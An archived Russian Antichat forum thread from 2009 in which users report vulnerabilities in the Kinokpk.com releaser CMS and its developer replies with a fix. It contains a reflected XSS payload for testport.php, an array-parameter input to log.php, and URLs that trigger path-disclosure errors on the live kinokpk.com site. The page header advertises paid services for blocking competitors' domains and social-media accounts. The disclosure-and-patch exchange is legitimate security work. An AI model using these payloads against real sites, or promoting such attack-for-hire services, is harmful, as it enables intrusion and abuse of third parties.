Форум АНТИЧАТ - Kinokpk.com releaser

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
Kinokpk.com releaser

Опции темы

Поиск в этой теме

Опции просмотра

Kinokpk.com releaser

25.08.2009, 12:09

vano793

Новичок

Регистрация: 07.12.2008

Сообщений: 4

Провел на форуме:
10412

Репутация: 1

Kinokpk.com releaser

Вот ты ZonD80 просил найти пусть ищют дальше

Я начну с 1-ой

PHP код:


		
			
testport.php?port=><script>alert(/Hi/)</script>

Такая же и на TBDev

Последний раз редактировалось vano793; 25.08.2009 в 12:11..

25.08.2009, 12:17

HAXTA4OK

Reservists Of Antichat - Level 6

Регистрация: 15.03.2009

Сообщений: 560

Провел на форуме:
4358210

Репутация: 2017

читай все страницы и ты найдеш что в TBDev http://forum.antichat.net/threadnav79705-18-10.html я уже кидал про xss эту

но раз другой двиг (уже с убранными дырами тебе +)

25.08.2009, 12:18

vano793

Новичок

Регистрация: 07.12.2008

Сообщений: 4

Провел на форуме:
10412

Репутация: 1

Цитата:

Сообщение от HAXTA4OK

читай все страницы и ты найдеш что в TBDev http://forum.antichat.net/threadnav79705-18-10.html я уже кидал про xss эту

Я это знаю но на днях ZonD80 просил дыры выложить
У меня стоит его движок 2.70 но там есть дырка

Вот что он писал

Цитата:

Сообщение от ZonD80

Ребят, хватит юну мучать, он прекрасно знает, где и какие дырки.

Давайте меня помучайте: http://dev.kinokpk.com/releases/Kinokpk.com_releaser_v.2.70.7z

27.08.2009, 11:54

vano793

Новичок

Регистрация: 07.12.2008

Сообщений: 4

Провел на форуме:
10412

Репутация: 1

Пишу в эту тему так как она есть на Kinokpk.com releaser
Нашол HAXTA4OK

PHP код:


		
			
/log.php?type[]=

31.08.2009, 12:30

ZonD80

Новичок

Регистрация: 29.10.2008

Сообщений: 5

Провел на форуме:
25077

Репутация: 4

vano793 ну про тестпорт, это вранье

а вот про лог спасибо.

log.php
найти:

Код:

  $type = htmlspecialchars($_GET["type"]);

заменить на:

Код:

  $type = htmlspecialchars((string)$_GET["type"]);

Последний раз редактировалось ZonD80; 31.08.2009 в 12:38..

31.08.2009, 13:28

HAXTA4OK

Reservists Of Antichat - Level 6

Регистрация: 15.03.2009

Сообщений: 560

Провел на форуме:
4358210

Репутация: 2017

Раскрытие путей тебе

http://kinokpk.com/requests.php?id[]=28

Fatal error: Unsupported operand types in /var/*/kinokpk.com/*/requests.php on line 216

http://kinokpk.com/requests.php?action=vote&voteid[]=28

Fatal error: Unsupported operand types in /var/*/kinokpk.com/*/requests.php on line 216

http://kinokpk.com/details.php?id[]=246

Fatal error: Unsupported operand types in /var/*/kinokpk.com/*/requests.php on line 216

http://kinokpk.com/invite.php?id[]=987&type=new

Fatal error: Unsupported operand types in /var/*/kinokpk.com/*/requests.php on line 216

Последний раз редактировалось HAXTA4OK; 31.08.2009 в 13:40..

31.08.2009, 22:35

ZonD80

Новичок

Регистрация: 29.10.2008

Сообщений: 5

Провел на форуме:
25077

Репутация: 4

HAXTA4OK, на сайте-то может быть и так, тут ищутся дырки движка, а не сайта.

Если хочешь поискать на сайте - ищи на http://www.torrentsbook.com

« Предыдущая тема | Следующая тема »

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход